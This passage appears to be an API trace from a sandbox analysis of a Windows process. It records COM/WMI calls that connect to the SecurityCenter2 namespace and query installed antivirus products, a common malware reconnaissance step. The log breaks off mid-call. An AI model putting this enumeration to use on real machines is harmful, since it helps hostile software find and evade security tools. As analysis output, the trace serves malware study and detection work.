rclsid=0x761b14*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36ee38 | out: ppv=0x36ee38*=0x5e8daf0) returned 0x0 [0215.826] WbemLocator:IUnknown:QueryInterface (in: This=0x5e8daf0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36f050 | out: ppvObject=0x36f050*=0x0) returned 0x80004002 [0215.826] WbemLocator:IClassFactory:CreateInstance (in: This=0x5e8daf0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f05c | out: ppvObject=0x36f05c*=0x5e89270) returned 0x0 [0215.826] WbemLocator:IUnknown:Release (This=0x5e8daf0) returned 0x0 [0215.826] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89270, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ec7c | out: ppvObject=0x36ec7c*=0x5e89270) returned 0x0 [0215.826] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89270, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36ec30 | out: ppvObject=0x36ec30*=0x0) returned 0x80004002 [0215.826] WbemLocator:IUnknown:AddRef (This=0x5e89270) returned 0x3 [0215.827] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89270, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e58c | out: ppvObject=0x36e58c*=0x0) returned 0x80004002 [0215.827] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89270, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e53c | out: ppvObject=0x36e53c*=0x0) returned 0x80004002 [0215.827] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89270, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e548 | out: ppvObject=0x36e548*=0x0) returned 0x80004002 [0215.827] CoGetContextToken (in: pToken=0x36e5a8 | out: pToken=0x36e5a8) returned 0x0 [0215.827] CoGetContextToken (in: pToken=0x36e9bc | out: pToken=0x36e9bc) returned 0x0 [0215.827] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89270, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ea3c | out: ppvObject=0x36ea3c*=0x0) returned 0x80004002 [0215.827] WbemLocator:IUnknown:Release (This=0x5e89270) returned 0x2 [0215.827] WbemLocator:IUnknown:Release (This=0x5e89270) returned 0x1 [0215.827] CoGetContextToken (in: pToken=0x36f03c | out: pToken=0x36f03c) returned 0x0 [0215.827] CoGetContextToken (in: pToken=0x36ef9c | out: pToken=0x36ef9c) returned 0x0 [0215.827] WbemLocator:IUnknown:QueryInterface (in: This=0x5e89270, riid=0x36f06c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36f068 | out: ppvObject=0x36f068*=0x5e89270) returned 0x0 [0215.827] WbemLocator:IUnknown:AddRef (This=0x5e89270) returned 0x3 [0215.827] WbemLocator:IUnknown:Release (This=0x5e89270) returned 0x2 [0215.827] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768f28, puCount=0x36f1f8 | out: puCount=0x36f1f8*=0x2) returned 0x0 [0215.827] WbemDefPath:IWbemPath:GetText (in: This=0x768f28, lFlags=8, puBuffLength=0x36f1f4*=0x0, pszText=0x0 | out: puBuffLength=0x36f1f4*=0x19, pszText=0x0) returned 0x0 [0215.827] WbemDefPath:IWbemPath:GetText (in: This=0x768f28, lFlags=8, puBuffLength=0x36f1f4*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x36f1f4*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0215.827] CoCreateInstance (in: rclsid=0x727c3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x727c3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x36f090 | out: ppv=0x36f090*=0x5e89250) returned 0x0 [0215.827] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5e89250, strNetworkResource="\\\\.\\ROOT\\SecurityCenter2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x36f144 | out: ppNamespace=0x36f144*=0x793058) returned 0x0 [0215.891] WbemLocator:IUnknown:QueryInterface (in: This=0x793058, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36efb4 | out: ppvObject=0x36efb4*=0x7850c4) returned 0x0 [0215.891] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x7850c4, pProxy=0x793058, pAuthnSvc=0x36f004, pAuthzSvc=0x36f000, pServerPrincName=0x36eff8, pAuthnLevel=0x36effc, pImpLevel=0x36efec, pAuthInfo=0x36eff0, pCapabilites=0x36eff4 | out: pAuthnSvc=0x36f004*=0xa, pAuthzSvc=0x36f000*=0x0, pServerPrincName=0x36eff8, pAuthnLevel=0x36effc*=0x6, pImpLevel=0x36efec*=0x2, pAuthInfo=0x36eff0, pCapabilites=0x36eff4*=0x1) returned 0x0 [0215.891] WbemLocator:IUnknown:Release (This=0x7850c4) returned 0x1 [0215.891] WbemLocator:IUnknown:QueryInterface (in: This=0x793058, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36efa8 | out: ppvObject=0x36efa8*=0x7850e4) returned 0x0 [0215.891] WbemLocator:IUnknown:QueryInterface (in: This=0x793058, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ef94 | out: ppvObject=0x36ef94*=0x7850c4) returned 0x0 [0215.891] WbemLocator:IClientSecurity:SetBlanket (This=0x7850c4, pProxy=0x793058, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0215.892] WbemLocator:IUnknown:Release (This=0x7850c4) returned 0x2 [0215.892] WbemLocator:IUnknown:Release (This=0x7850e4) returned 0x1 [0215.892] CoTaskMemFree (pv=0x794098) [0215.892] WbemLocator:IUnknown:AddRef (This=0x793058) returned 0x2 [0215.892] WbemLocator:IUnknown:Release (This=0x5e89250) returned 0x0 [0215.892] CoGetContextToken (in: pToken=0x36e4e8 | out: pToken=0x36e4e8) returned 0x0 [0215.893] CoGetContextToken (in: pToken=0x36e8fc | out: pToken=0x36e8fc) returned 0x0 [0215.893] WbemLocator:IUnknown:QueryInterface (in: This=0x793058, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e894 | out: ppvObject=0x36e894*=0x7850cc) returned 0x0 [0215.893] WbemLocator:IRpcOptions:Query (in: This=0x7850cc, pPrx=0x5e8db38, dwProperty=2, pdwValue=0x36e988 | out: pdwValue=0x36e988) returned 0x80004002 [0215.893] WbemLocator:IUnknown:Release (This=0x7850cc) returned 0x2 [0215.893] CoGetContextToken (in: pToken=0x36eecc | out: pToken=0x36eecc) returned 0x0 [0215.893] CoGetContextToken (in: pToken=0x36ee2c | out: pToken=0x36ee2c) returned 0x0 [0215.893] WbemLocator:IUnknown:QueryInterface (in: This=0x793058, riid=0x36eefc*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x36edc8 | out: ppvObject=0x36edc8*=0x793058) returned 0x0 [0215.893] WbemLocator:IUnknown:Release (This=0x793058) returned 0x2 [0215.893] SysStringLen (param_1=0x0) returned 0x0 [0215.893] CoGetContextToken (in: pToken=0x36effc | out: pToken=0x36effc) returned 0x0 [0215.893] IWbemServices:ExecQuery (in: This=0x793058, strQueryLanguage="WQL", strQuery="SELECT * FROM AntivirusProduct", lFlags=16, pCtx=0x0, ppEnum=0x36f204 | out: ppEnum=0x36f204*=0x70f9f0) returned 0x0 [0215.899] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f060 | out: ppvObject=0x36f060*=0x70f9f4) returned 0x0 [0215.899] IClientSecurity:QueryBlanket (in: This=0x70f9f4, pProxy=0x70f9f0, pAuthnSvc=0x36f0b0, pAuthzSvc=0x36f0ac, pServerPrincName=0x36f0a4, pAuthnLevel=0x36f0a8, pImpLevel=0x36f098, pAuthInfo=0x36f09c, pCapabilites=0x36f0a0 | out: pAuthnSvc=0x36f0b0*=0xa, pAuthzSvc=0x36f0ac*=0x0, pServerPrincName=0x36f0a4, pAuthnLevel=0x36f0a8*=0x6, pImpLevel=0x36f098*=0x2, pAuthInfo=0x36f09c, pCapabilites=0x36f0a0*=0x1) returned 0x0 [0215.899] IUnknown:Release (This=0x70f9f4) returned 0x1 [0215.899] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f054 | out: ppvObject=0x36f054*=0x784a54) returned 0x0 [0215.899] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f040 | out: ppvObject=0x36f040*=0x70f9f4) returned 0x0 [0215.899] IClientSecurity:SetBlanket (This=0x70f9f4, pProxy=0x70f9f0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0215.901] IUnknown:Release (This=0x70f9f4) returned 0x2 [0215.901] WbemLocator:IUnknown:Release (This=0x784a54) returned 0x1 [0215.901] CoTaskMemFree (pv=0x794008) [0215.901] IUnknown:AddRef (This=0x70f9f0) returned 0x2 [0215.901] CoGetContextToken (in: pToken=0x36e580 | out: pToken=0x36e580) returned 0x0 [0215.901] CoGetContextToken (in: pToken=0x36e994 | out: pToken=0x36e994) returned 0x0 [0215.901] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e92c | out: ppvObject=0x36e92c*=0x784a3c) returned 0x0 [0215.902] WbemLocator:IRpcOptions:Query (in: This=0x784a3c, pPrx=0x5e8db08, dwProperty=2, pdwValue=0x36ea20 | out: pdwValue=0x36ea20) returned 0x80004002 [0215.902] WbemLocator:IUnknown:Release (This=0x784a3c) returned 0x2 [0215.902] CoGetContextToken (in: pToken=0x36ef64 | out: pToken=0x36ef64) returned 0x0 [0215.902] CoGetContextToken (in: pToken=0x36eec4 | out: pToken=0x36eec4) returned 0x0 [0215.902] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x36ef94*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36ee60 | out: ppvObject=0x36ee60*=0x70f9f0) returned 0x0 [0215.902] IUnknown:Release (This=0x70f9f0) returned 0x2 [0215.902] SysStringLen (param_1=0x0) returned 0x0 [0215.902] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768f28, puCount=0x36f250 | out: puCount=0x36f250*=0x2) returned 0x0 [0215.902] WbemDefPath:IWbemPath:GetText (in: This=0x768f28, lFlags=4, puBuffLength=0x36f24c*=0x0, pszText=0x0 | out: puBuffLength=0x36f24c*=0x19, pszText=0x0) returned 0x0 [0215.902] WbemDefPath:IWbemPath:GetText (in: This=0x768f28, lFlags=4, puBuffLength=0x36f24c*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x36f24c*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0215.902] CoGetContextToken (in: pToken=0x36f0a4 | out: pToken=0x36f0a4) returned 0x0 [0215.902] IEnumWbemClassObject:Clone (in: This=0x70f9f0, ppEnum=0x36f25c | out: ppEnum=0x36f25c*=0x70fab8) returned 0x0 [0215.904] IUnknown:QueryInterface (in: This=0x70fab8, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f118 | out: ppvObject=0x36f118*=0x70fabc) returned 0x0 [0215.904] IClientSecurity:QueryBlanket (in: This=0x70fabc, pProxy=0x70fab8, pAuthnSvc=0x36f168, pAuthzSvc=0x36f164, pServerPrincName=0x36f15c, pAuthnLevel=0x36f160, pImpLevel=0x36f150, pAuthInfo=0x36f154, pCapabilites=0x36f158 | out: pAuthnSvc=0x36f168*=0xa, pAuthzSvc=0x36f164*=0x0, pServerPrincName=0x36f15c, pAuthnLevel=0x36f160*=0x6, pImpLevel=0x36f150*=0x2, pAuthInfo=0x36f154, pCapabilites=0x36f158*=0x1) returned 0x0 [0215.904] IUnknown:Release (This=0x70fabc) returned 0x1 [0215.904] IUnknown:QueryInterface (in: This=0x70fab8, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f10c | out: ppvObject=0x36f10c*=0x7852c4) returned 0x0 [0215.904] IUnknown:QueryInterface (in: This=0x70fab8, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f0f8 | out: ppvObject=0x36f0f8*=0x70fabc) returned 0x0 [0215.904] IClientSecurity:SetBlanket (This=0x70fabc, pProxy=0x70fab8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0215.905] IUnknown:Release (This=0x70fabc) returned 0x2 [0215.905] WbemLocator:IUnknown:Release (This=0x7852c4) returned 0x1 [0215.906] CoTaskMemFree (pv=0x7940c8) [0215.906] IUnknown:AddRef (This=0x70fab8) returned 0x2 [0215.906] CoGetContextToken (in: pToken=0x36e628 | out: pToken=0x36e628) returned 0x0 [0215.906] CoGetContextToken (in: pToken=0x36ea3c | out: pToken=0x36ea3c) returned 0x0 [0215.906] IUnknown:QueryInterface (in: This=0x70fab8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e9d4 | out: ppvObject=0x36e9d4*=0x7852ac) returned 0x0 [0215.907] WbemLocator:IRpcOptions:Query (in: This=0x7852ac, pPrx=0x5e8dbc8, dwProperty=2, pdwValue=0x36eac8 | out: pdwValue=0x36eac8) returned 0x80004002 [0215.907] WbemLocator:IUnknown:Release (This=0x7852ac) returned 0x2 [0215.907] CoGetContextToken (in: pToken=0x36f00c | out: pToken=0x36f00c) returned 0x0 [0215.907] CoGetContextToken (in: pToken=0x36ef6c | out: pToken=0x36ef6c) returned 0x0 [0215.907] IUnknown:QueryInterface (in: This=0x70fab8, riid=0x36f03c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36ef08 | out: ppvObject=0x36ef08*=0x70fab8) returned 0x0 [0215.907] IUnknown:Release (This=0x70fab8) returned 0x2 [0215.907] SysStringLen (param_1=0x0) returned 0x0 [0215.907] IEnumWbemClassObject:Reset (This=0x70fab8) returned 0x0 [0215.908] CoTaskMemAlloc (cb=0x4) returned 0x5e892e0 [0215.908] IEnumWbemClassObject:Next (in: This=0x70fab8, lTimeout=-1, uCount=0x1, apObjects=0x5e892e0, puReturned=0x246cddc | out: apObjects=0x5e892e0*=0x0, puReturned=0x246cddc*=0x0) returned 0x1 [0215.909] CoTaskMemFree (pv=0x5e892e0) [0215.909] CoGetContextToken (in: pToken=0x36f180 | out: pToken=0x36f180) returned 0x0 [0215.909] IUnknown:Release (This=0x70fab8) returned 0x1 [0215.909] IUnknown:Release (This=0x70fab8) returned 0x0 [0215.910] CoGetContextToken (in: pToken=0x36f180 | out: pToken=0x36f180) returned 0x0 [0215.910] IUnknown:Release (This=0x70f9f0) returned 0x1 [0215.910] IUnknown:Release (This=0x70f9f0) returned 0x0 [0215.911] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f278 | out: ppv=0x36f278*=0x6ee4bc) returned 0x0 [0215.911] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f270 | out: pAptType=0x36f270*=1) returned 0x0 [0215.911] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f274 | out: ppvObject=0x36f274*=0x0) returned 0x80004002 [0215.911] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0215.912] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36ebe0 | out: ppv=0x36ebe0*=0x5e892e0) returned 0x0 [0215.912] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e892e0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36edf8 | out: ppvObject=0x36edf8*=0x0) returned 0x80004002 [0215.912] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e892e0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ee04 | out: ppvObject=0x36ee04*=0x768f98) returned 0x0 [0215.912] WbemDefPath:IUnknown:Release (This=0x5e892e0) returned 0x0 [0215.912] WbemDefPath:IUnknown:QueryInterface (in: This=0x768f98, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ea24 | out: ppvObject=0x36ea24*=0x768f98) returned 0x0 [0215.912] WbemDefPath:IUnknown:QueryInterface (in: This=0x768f98, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e9d8 | out: ppvObject=0x36e9d8*=0x0) returned 0x80004002 [0215.913] WbemDefPath:IUnknown:AddRef (This=0x768f98) returned 0x3 [0215.913] WbemDefPath:IUnknown:QueryInterface (in: This=0x768f98, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e334 | out: ppvObject=0x36e334*=0x0) returned 0x80004002 [0215.913] WbemDefPath:IUnknown:QueryInterface (in: This=0x768f98, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e2e4 | out: ppvObject=0x36e2e4*=0x0) returned 0x80004002 [0215.913] WbemDefPath:IUnknown:QueryInterface (in: This=0x768f98, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e2f0 | out: ppvObject=0x36e2f0*=0x5e892a0) returned 0x0 [0215.913] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e892a0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e2f8 | out: pCid=0x36e2f8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0215.913] WbemDefPath:IUnknown:Release (This=0x5e892a0) returned 0x3 [0215.913] CoGetContextToken (in: pToken=0x36e350 | out: pToken=0x36e350) returned 0x0 [0215.913] CoGetContextToken (in: pToken=0x36e764 | out: pToken=0x36e764) returned 0x0 [0215.913] WbemDefPath:IUnknown:QueryInterface (in: This=0x768f98, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e7e4 | out: ppvObject=0x36e7e4*=0x0) returned 0x80004002 [0215.913] WbemDefPath:IUnknown:Release (This=0x768f98) returned 0x2 [0215.913] WbemDefPath:IUnknown:Release (This=0x768f98) returned 0x1 [0215.913] CoGetContextToken (in: pToken=0x36f0fc | out: pToken=0x36f0fc) returned 0x0 [0215.913] CoGetContextToken (in: pToken=0x36f05c | out: pToken=0x36f05c) returned 0x0 [0215.913] WbemDefPath:IUnknown:QueryInterface (in: This=0x768f98, riid=0x36f12c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f128 | out: ppvObject=0x36f128*=0x768f98) returned 0x0 [0215.913] WbemDefPath:IUnknown:AddRef (This=0x768f98) returned 0x3 [0215.913] WbemDefPath:IUnknown:Release (This=0x768f98) returned 0x2 [0215.913] WbemDefPath:IWbemPath:SetText (This=0x768f98, uMode=0x4, pszPath="ROOT\\SecurityCenter2") returned 0x0 [0215.913] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768f98, puCount=0x36f2a0 | out: puCount=0x36f2a0*=0x2) returned 0x0 [0215.914] WbemDefPath:IWbemPath:GetText (in: This=0x768f98, lFlags=4, puBuffLength=0x36f29c*=0x0, pszText=0x0 | out: puBuffLength=0x36f29c*=0x19, pszText=0x0) returned 0x0 [0215.914] WbemDefPath:IWbemPath:GetText (in: This=0x768f98, lFlags=4, puBuffLength=0x36f29c*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x36f29c*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0215.914] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768f98, puCount=0x36f28c | out: puCount=0x36f28c*=0x2) returned 0x0 [0215.914] WbemDefPath:IWbemPath:GetText (in: This=0x768f98, lFlags=4, puBuffLength=0x36f288*=0x0, pszText=0x0 | out: puBuffLength=0x36f288*=0x19, pszText=0x0) returned 0x0 [0215.914] WbemDefPath:IWbemPath:GetText (in: This=0x768f98, lFlags=4, puBuffLength=0x36f288*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x36f288*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0215.914] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f21c | out: ppv=0x36f21c*=0x6ee4bc) returned 0x0 [0215.914] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f214 | out: pAptType=0x36f214*=1) returned 0x0 [0215.914] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f218 | out: ppvObject=0x36f218*=0x0) returned 0x80004002 [0215.914] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0215.915] CoGetClassObject (in: rclsid=0x761b14*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36ee38 | out: ppv=0x36ee38*=0x5e8dc40) returned 0x0 [0215.915] WbemLocator:IUnknown:QueryInterface (in: This=0x5e8dc40, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36f050 | out: 